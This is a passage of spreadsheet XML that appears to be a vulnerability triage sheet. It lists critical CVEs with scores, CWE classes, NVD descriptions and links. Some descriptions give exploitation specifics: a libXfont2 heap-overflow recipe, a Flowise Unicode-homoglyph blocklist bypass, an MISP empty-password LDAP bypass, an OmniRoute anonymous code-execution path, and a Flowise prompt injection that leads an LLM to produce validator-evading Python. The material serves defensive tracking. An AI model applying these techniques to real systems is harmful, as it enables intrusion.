          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J350" s="5" t="inlineStr"/>
      <c r="K350" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="L350" s="5" t="inlineStr">
        <is>
          <t>Out of bounds write in ANGLE in Google Chrome on on Windows prior to 153.0.8010.36 allowed a remote attacker to potentially execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="M350" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87621</t>
        </is>
      </c>
    </row>
    <row r="351">
      <c r="A351" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B351" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87634</t>
        </is>
      </c>
      <c r="C351" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="D351" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E351" s="5" t="inlineStr"/>
      <c r="F351" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G351" s="5" t="inlineStr"/>
      <c r="H351" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I351" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J351" s="5" t="inlineStr"/>
      <c r="K351" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L351" s="5" t="inlineStr">
        <is>
          <t>Use after free in WebPackaging in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to potentially execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: Low)</t>
        </is>
      </c>
      <c r="M351" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87634</t>
        </is>
      </c>
    </row>
    <row r="352">
      <c r="A352" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B352" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87637</t>
        </is>
      </c>
      <c r="C352" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="D352" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E352" s="5" t="inlineStr"/>
      <c r="F352" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G352" s="5" t="inlineStr"/>
      <c r="H352" s="5" t="inlineStr">
        <is>
          <t>apple:macos, google:chrome</t>
        </is>
      </c>
      <c r="I352" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J352" s="5" t="inlineStr"/>
      <c r="K352" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L352" s="5" t="inlineStr">
        <is>
          <t>Use after free in Extensions in Google Chrome on on Mac prior to 153.0.8010.36 allowed a remote attacker to execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="M352" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87637</t>
        </is>
      </c>
    </row>
    <row r="353">
      <c r="A353" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B353" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87638</t>
        </is>
      </c>
      <c r="C353" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="D353" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E353" s="5" t="inlineStr"/>
      <c r="F353" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G353" s="5" t="inlineStr"/>
      <c r="H353" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I353" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J353" s="5" t="inlineStr"/>
      <c r="K353" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="L353" s="5" t="inlineStr">
        <is>
          <t>Out of bounds write in Media in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to potentially execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="M353" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87638</t>
        </is>
      </c>
    </row>
    <row r="354">
      <c r="A354" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B354" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87643</t>
        </is>
      </c>
      <c r="C354" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="D354" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E354" s="5" t="inlineStr"/>
      <c r="F354" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G354" s="5" t="inlineStr"/>
      <c r="H354" s="5" t="inlineStr">
        <is>
          <t>google:android, google:chrome</t>
        </is>
      </c>
      <c r="I354" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J354" s="5" t="inlineStr"/>
      <c r="K354" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="L354" s="5" t="inlineStr">
        <is>
          <t>Integer overflow in GPU in Google Chrome on on Android prior to 153.0.8010.36 allowed a remote attacker to potentially execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="M354" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87643</t>
        </is>
      </c>
    </row>
    <row r="355">
      <c r="A355" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B355" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87646</t>
        </is>
      </c>
      <c r="C355" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="D355" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E355" s="5" t="inlineStr"/>
      <c r="F355" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G355" s="5" t="inlineStr"/>
      <c r="H355" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I355" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J355" s="5" t="inlineStr"/>
      <c r="K355" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L355" s="5" t="inlineStr">
        <is>
          <t>Use after free in Web Authentication in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="M355" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87646</t>
        </is>
      </c>
    </row>
    <row r="356">
      <c r="A356" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B356" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87650</t>
        </is>
      </c>
      <c r="C356" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="D356" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E356" s="5" t="inlineStr"/>
      <c r="F356" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G356" s="5" t="inlineStr"/>
      <c r="H356" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I356" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J356" s="5" t="inlineStr"/>
      <c r="K356" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L356" s="5" t="inlineStr">
        <is>
          <t>Out of bounds read in WebGL in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to potentially execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="M356" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87650</t>
        </is>
      </c>
    </row>
    <row r="357">
      <c r="A357" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B357" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87654</t>
        </is>
      </c>
      <c r="C357" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="D357" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E357" s="5" t="inlineStr"/>
      <c r="F357" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G357" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H357" s="5" t="inlineStr">
        <is>
          <t>google:chrome, microsoft:windows</t>
        </is>
      </c>
      <c r="I357" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J357" s="5" t="inlineStr"/>
      <c r="K357" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L357" s="5" t="inlineStr">
        <is>
          <t>Buffer overflow in ANGLE in Google Chrome on on Windows prior to 153.0.8010.36 allowed a remote attacker to execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="M357" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87654</t>
        </is>
      </c>
    </row>
    <row r="358">
      <c r="A358" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B358" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-44950</t>
        </is>
      </c>
      <c r="C358" s="5" t="n">
        <v>9.5</v>
      </c>
      <c r="D358" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E358" s="5" t="inlineStr"/>
      <c r="F358" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G358" s="5" t="inlineStr"/>
      <c r="H358" s="5" t="inlineStr"/>
      <c r="I358" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J358" s="5" t="inlineStr"/>
      <c r="K358" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L358" s="5" t="inlineStr">
        <is>
          <t>fs_read_glyphs() in the libXfont2 font-server client (src/fc/fserve.c) copies each glyph's bitmap into a single buffer. Existing checks validates only that the source slice (position, length) lies within the source bitmap buffer. It does not check whether the running destination cursor has exceeded the allocation.
A malicious font server can send overlapping source offsets -- for example 1000 glyphs each referencing {position:0, length:64} with nbytes=64. Each individual source range passes the existing validation, but the cumulative writes total 64000 bytes into a 64-byte destination buffer. This is a heap buffer overflow with attacker-controlled content.</t>
        </is>
      </c>
      <c r="M358" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-44950</t>
        </is>
      </c>
    </row>
    <row r="359">
      <c r="A359" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B359" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-65639</t>
        </is>
      </c>
      <c r="C359" s="5" t="n">
        <v>9.5</v>
      </c>
      <c r="D359" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E359" s="5" t="inlineStr"/>
      <c r="F359" s="5" t="inlineStr"/>
      <c r="G359" s="5" t="inlineStr"/>
      <c r="H359" s="5" t="inlineStr"/>
      <c r="I359" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J359" s="5" t="inlineStr"/>
      <c r="K359" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L359" s="5" t="inlineStr">
        <is>
          <t>OS command injection in the advanced-rule parser of ConfigServer Security &amp; Firewall allows a remote attacker who controls a configured allow/deny feed to execute arbitrary commands as root, due to insufficient validation of feed-supplied rule data.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M359" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-65639</t>
        </is>
      </c>
    </row>
    <row r="360">
      <c r="A360" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B360" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66066</t>
        </is>
      </c>
      <c r="C360" s="5" t="n">
        <v>9.5</v>
      </c>
      <c r="D360" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E360" s="5" t="inlineStr"/>
      <c r="F360" s="5" t="n">
        <v>0.279</v>
      </c>
      <c r="G360" s="5" t="inlineStr"/>
      <c r="H360" s="5" t="inlineStr"/>
      <c r="I360" s="5" t="inlineStr">
        <is>
          <t>2026-07-30</t>
        </is>
      </c>
      <c r="J360" s="5" t="inlineStr"/>
      <c r="K360" s="5" t="inlineStr">
        <is>
          <t>CWE-1188</t>
        </is>
      </c>
      <c r="L360" s="5" t="inlineStr">
        <is>
          <t>Action Pack is a framework for handling and responding to web requests. In versions prior to 7.2.3.2, 8.0.5.1 and 8.1.3.1, Active Storage does not disable libvips operations marked unsafe for untrusted content, allowing a crafted upload to invoke such an operation. Consuming applications are affected when configured to use libvips and accept image uploads from untrusted users. An unauthenticated attacker may exploit this behavior to read arbitrary files accessible to the Rails process, including environment variables and application secrets. Exposure of credentials such as secret_key_base or external-service tokens may enable remote code execution or lateral movement. This issue has been fixed in versions 7.2.3.2, 8.0.5.1 and 8.1.3.1.</t>
        </is>
      </c>
      <c r="M360" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66066</t>
        </is>
      </c>
    </row>
    <row r="361">
      <c r="A361" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B361" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70470</t>
        </is>
      </c>
      <c r="C361" s="5" t="n">
        <v>9.5</v>
      </c>
      <c r="D361" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E361" s="5" t="inlineStr"/>
      <c r="F361" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G361" s="5" t="inlineStr">
        <is>
          <t>java, python</t>
        </is>
      </c>
      <c r="H361" s="5" t="inlineStr"/>
      <c r="I361" s="5" t="inlineStr">
        <is>
          <t>2026-08-04</t>
        </is>
      </c>
      <c r="J361" s="5" t="inlineStr"/>
      <c r="K361" s="5" t="inlineStr">
        <is>
          <t>CWE-184</t>
        </is>
      </c>
      <c r="L361" s="5" t="inlineStr">
        <is>
          <t>Flowise is a drag &amp; drop user interface to build a customized large language model flow. Prior to 3.1.3, Flowise validatePythonCodeForDataFrame in packages/components/src/pythonCodeValidator.ts can be bypassed with Unicode homoglyph identifiers, allowing arbitrary Python execution inside Pyodide and full OS command execution on the Flowise host via Pyodide js module interop. The validator gates pyodide.runPythonAsync in packages/components/nodes/agents/CSVAgent/CSVAgent.ts and packages/components/nodes/agents/AirtableAgent/AirtableAgent.ts with an ASCII word-boundary blacklist. JavaScript regex word boundaries are ASCII-only, while Python 3 NFKC-normalizes identifiers at parse time, so homoglyph forms such as __cl𝐚ss__, __subcl𝐚sses__, __b𝐚se__, and __b𝐮iltins__ bypass the blacklist and are parsed as their ASCII equivalents. This issue is fixed in version 3.1.3.</t>
        </is>
      </c>
      <c r="M361" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70470</t>
        </is>
      </c>
    </row>
    <row r="362">
      <c r="A362" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B362" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70477</t>
        </is>
      </c>
      <c r="C362" s="5" t="n">
        <v>9.5</v>
      </c>
      <c r="D362" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E362" s="5" t="inlineStr"/>
      <c r="F362" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G362" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H362" s="5" t="inlineStr"/>
      <c r="I362" s="5" t="inlineStr">
        <is>
          <t>2026-08-04</t>
        </is>
      </c>
      <c r="J362" s="5" t="inlineStr"/>
      <c r="K362" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L362" s="5" t="inlineStr">
        <is>
          <t>Flowise is a drag &amp; drop user interface to build a customized large language model flow. Prior to 3.1.3, a prompt injection sent to a chatflow using a CSV Agent node can cause the LLM to respond with a malicious Python script that bypasses the blocklist validator and executes in an unsandboxed Pyodide environment. The specific flaw exists within the run method of the CSV_Agents class, where untrusted data is used to construct an LLM prompt and the resulting pythonCode is validated by validatePythonCodeForDataFrame before execution. An attacker can leverage this to execute arbitrary code in the context of the service account. This issue is fixed in 3.1.3.</t>
        </is>
      </c>
      <c r="M362" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70477</t>
        </is>
      </c>
    </row>
    <row r="363">
      <c r="A363" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B363" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85216</t>
        </is>
      </c>
      <c r="C363" s="5" t="n">
        <v>9.5</v>
      </c>
      <c r="D363" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E363" s="5" t="inlineStr"/>
      <c r="F363" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G363" s="5" t="inlineStr"/>
      <c r="H363" s="5" t="inlineStr">
        <is>
          <t>misp-project:misp</t>
        </is>
      </c>
      <c r="I363" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J363" s="5" t="inlineStr"/>
      <c r="K363" s="5" t="inlineStr">
        <is>
          <t>CWE-521</t>
        </is>
      </c>
      <c r="L363" s="5" t="inlineStr">
        <is>
          <t>MISP contains an authentication bypass vulnerability in its LDAP and LinOTP authentication components due to insufficient validation of user-supplied credentials.
The custom LdapAuthenticate and LinOTPAuthenticate components replace CakePHP's FormAuthenticate implementation but did not replicate its credential validation checks. As a result, empty or non-string values could reach the underlying authentication mechanisms.
In the LDAP authentication path, an attacker able to identify a valid directory user's email address could submit an empty password. The empty credential could be passed to ldap_bind(), where an LDAP server accepting unauthenticated binds may return a successful result for a valid distinguished name combined with an empty password. MISP could consequently treat the attacker as the corresponding authenticated directory user without verification of the user's password.
The issue also affected the LinOTP authentication component. Invalid credential types were not rejected before being processed, and when mixed authentication was enabled, an empty password could be checked against a locally stored MISP password hash. LDAP-provisioned MISP accounts could additionally be created with an empty local password because account creation skipped normal validation, resulting in a hash corresponding to an empty password. This could permit authentication through the local fallback mechanism when such an account was no longer resolved through LDAP.
Successful exploitation could allow a remote unauthenticated attacker to impersonate an existing MISP user. If the targeted account has administrative or other privileged permissions, the attacker could gain corresponding access to sensitive threat-intelligence data, modify or delete information, alter configuration, or perform other privileged operations.
The patch resolves the vulnerability by requiring authentication identifiers and passwords to be valid strings, rejecting empty passwords where they are not explicitly permitted, and assigning a randomly generated local password to LDAP-provisioned accounts instead of storing a hash derived from an empty password.</t>
        </is>
      </c>
      <c r="M363" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85216</t>
        </is>
      </c>
    </row>
    <row r="364">
      <c r="A364" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B364" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88062</t>
        </is>
      </c>
      <c r="C364" s="5" t="n">
        <v>9.5</v>
      </c>
      <c r="D364" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E364" s="5" t="inlineStr"/>
      <c r="F364" s="5" t="inlineStr"/>
      <c r="G364" s="5" t="inlineStr"/>
      <c r="H364" s="5" t="inlineStr"/>
      <c r="I364" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J364" s="5" t="inlineStr"/>
      <c r="K364" s="5" t="inlineStr">
        <is>
          <t>CWE-306, CWE-94</t>
        </is>
      </c>
      <c r="L364" s="5" t="inlineStr">
        <is>
          <t>OmniRoute is an open-source AI gateway providing a single endpoint for multiple model providers. In 3.8.49 and earlier, the OmniRoute POST /api/acp/agents custom ACP agent endpoint accepted attacker-controlled binary and versionCommand values and used only a self-consistency check before execFileSync executed the selected interpreter and arguments. The same request called refreshAgentCache, and resolveVersionProbe accepted the matched command before the execFileSync sink ran it. The tokenizeVersionCommand function and DISALLOWED_VERSION_COMMAND_CHARS filter rejected a limited set of shell metacharacters but still allowed interpreter evaluation arguments. The isAuthenticated function relied on isAuthRequired, which accepted anonymous requests when requireLogin was false, while api/acp/ was absent from LOCAL_ONLY_API_PREFIXES and SPAWN_CAPABLE_PREFIXES. With requireLogin=false or during a fresh-instance bootstrap window, a remote anonymous request could supply an interpreter evaluation argument and execute arbitrary code in the server container. With requireLogin=true and a configured management password, exploitation instead required a management session or management-scoped API key. No fixed version is available as of this review.</t>
        </is>
      </c>
      <c r="M364" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88062</t>
        </is>
      </c>
    </row>
    <row r="365">
      <c r="A365" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B365" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-70141</t>
        </is>
      </c>
      <c r="C365" s="5" t="n">
        <v>9.4</v>
      </c>
      <c r="D365" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E365" s="5" t="inlineStr"/>
      <c r="F365" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G365" s="5" t="inlineStr"/>
      <c r="H365" s="5" t="inlineStr">
        <is>
          <t>oretnom23:customer_support_system</t>
        </is>
      </c>
      <c r="I365" s="5" t="inlineStr">
        <is>
          <t>2026-02-18</t>
        </is>
      </c>
      <c r="J365" s="5" t="inlineStr"/>
      <c r="K365" s="5" t="inlineStr">
        <is>
          <t>CWE-306, CWE-862</t>
        </is>
      </c>
      <c r="L365" s="5" t="inlineStr">
        <is>
          <t>SourceCodester Customer Support System 1.0 contains an incorrect access control vulnerability in ajax.php. The AJAX dispatcher does not enforce authentication or authorization before invoking administrative methods in admin_class.php based on the action parameter. An unauthenticated remote attacker can perform sensitive operations such as creating customers and deleting users (including the admin account), as well as modifying or deleting other application records (tickets, departments, comments), resulting in unauthorized data modification.</t>
        </is>
      </c>
      <c r="M365" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-70141</t>
        </is>
      </c>
    </row>
    <row r="366">
      <c r="A366" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B366" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-11841</t>
        </is>
      </c>
      <c r="C366" s="5" t="n">
        <v>9.4</v>
      </c>
      <c r="D366" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E366" s="5" t="inlineStr"/>
      <c r="F366" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G366" s="5" t="inlineStr"/>
      <c r="H366" s="5" t="inlineStr"/>
      <c r="I366" s="5" t="inlineStr">
        <is>
          <t>2026-07-28</t>
        </is>
      </c>
      <c r="J366" s="5" t="inlineStr"/>
      <c r="K366" s="5" t="inlineStr">
        <is>
          <t>CWE-552</t>
        </is>
      </c>
      <c r="L366" s="5" t="inlineStr">
        <is>
          <t>An attacker may perform unauthenticated read and write operations on sensitive filesystem areas via the AppEngine Fileaccess over HTTP due to improper access restrictions. A critical filesystem directory was unintentionally exposed through the HTTP-based file access feature, allowing access without authentication. This includes device parameter files, enabling an attacker to read and modify application settings, including customer-defined passwords. Additionally, exposure of the custom application directory may allow execution of arbitrary Lua code within the sandboxed AppEngine environment.</t>
        </is>
      </c>
      <c r="M366" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-11841</t>
        </is>
      </c>
    </row>
    <row r="367">
      <c r="A367" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B367" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-16242</t>
        </is>
      </c>
      <c r="C367" s="5" t="n">
        <v>9.4</v>
      </c>
      <c r="D367" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E367" s="5" t="inlineStr"/>
      <c r="F367" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G367" s="5" t="inlineStr"/>
      <c r="H367" s="5" t="inlineStr"/>
      <c r="I367" s="5" t="inlineStr">
        <is>
          <t>2026-07-20</t>
        </is>
      </c>
      <c r="J367" s="5" t="inlineStr"/>
      <c r="K367" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="L367" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in the Konnectivity proxy-server configuration for hosted control planes. The agent-facing listener was started without --cluster-ca-cert (and without token-based agent authentication), so client certificates were not validated. A remote attacker who can reach the Konnectivity cluster endpoint could connect as an unauthenticated agent, join the routing pool, and potentially proxy, inspect, modify, or drop control-plane-to-node traffic.</t>
        </is>
      </c>
      <c r="M367" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-16242</t>
        </is>
      </c>
    </row>
    <row r="368">
      <c r="A368" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B368" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-39975</t>
        </is>
      </c>
      <c r="C368" s="5" t="n">
        <v>9.4</v>
      </c>
      <c r="D368" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E368" s="5" t="inlineStr"/>
      <c r="F368" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G368" s="5" t="inlineStr"/>
      <c r="H368" s="5" t="inlineStr"/>
      <c r="I368" s="5" t="inlineStr">
        <is>
          <t>2026-08-24</t>
        </is>
      </c>
      <c r="J368" s="5" t="inlineStr"/>
      <c r="K368" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L368" s="5" t="inlineStr">
        <is>
          <t>Combodo iTop is a web-based IT service management tool. Prior to 3.2.3, unauthenticated users could delete the .readonly file on iTop instances, leading to code execution. This file, created during the setup process, prevents users from performing write actions. This issue has been fixed in version 3.2.3.</t>
        </is>
      </c>
      <c r="M368" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-39975</t>
        </is>
      </c>
    </row>
    <row r="369">
      <c r="A369" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B369" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-41242</t>
        </is>
      </c>
      <c r="C369" s="5" t="n">
        <v>9.4</v>
      </c>
      <c r="D369" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E369" s="5" t="inlineStr"/>
      <c r="F369" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G369" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H369" s="5" t="inlineStr">
        <is>
          <t>protobufjs_project:protobufjs</t>
        </is>
      </c>
      <c r="I369" s="5" t="inlineStr">
        <is>
          <t>2026-04-18</t>
        </is>
      </c>
      <c r="J369" s="5" t="inlineStr"/>
      <c r="K369" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L369" s="5" t="inlineStr">
        <is>
          <t>protobufjs compiles protobuf definitions into JavaScript (JS) functions. In versions prior to 8.0.1 and 7.5.5, attackers can inject arbitrary code in the "type" fields of protobuf definitions, which will then execute during object decoding using that definition. Versions 8.0.1 and 7.5.5 patch the issue.</t>
        </is>
      </c>
      <c r="M369" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-41242</t>
        </is>
      </c>
    </row>
    <row r="370">
      <c r="A370" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B370" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-43114</t>
        </is>
      </c>
      <c r="C370" s="5" t="n">
        <v>9.4</v>
      </c>
      <c r="D370" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E370" s="5" t="inlineStr"/>
      <c r="F370" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G370" s="5" t="inlineStr">
        <is>
          <t>linux kernel</t>
        </is>
      </c>
      <c r="H370" s="5" t="inlineStr">
        <is>
          <t>linux:linux_kernel</t>
        </is>
      </c>
      <c r="I370" s="5" t="inlineStr">
        <is>
          <t>2026-05-06</t>
        </is>
      </c>
      <c r="J370" s="5" t="inlineStr"/>
      <c r="K370" s="5" t="inlineStr">
        <is>
          <t>CWE-480</t>
        </is>
      </c>
      <c r="L370" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
netfilter: nft_set_pipapo_avx2: don't return non-matching entry on expiry
New test case fails unexpectedly when avx2 matching functions are used.
The test first loads a ranomly generated pipapo set
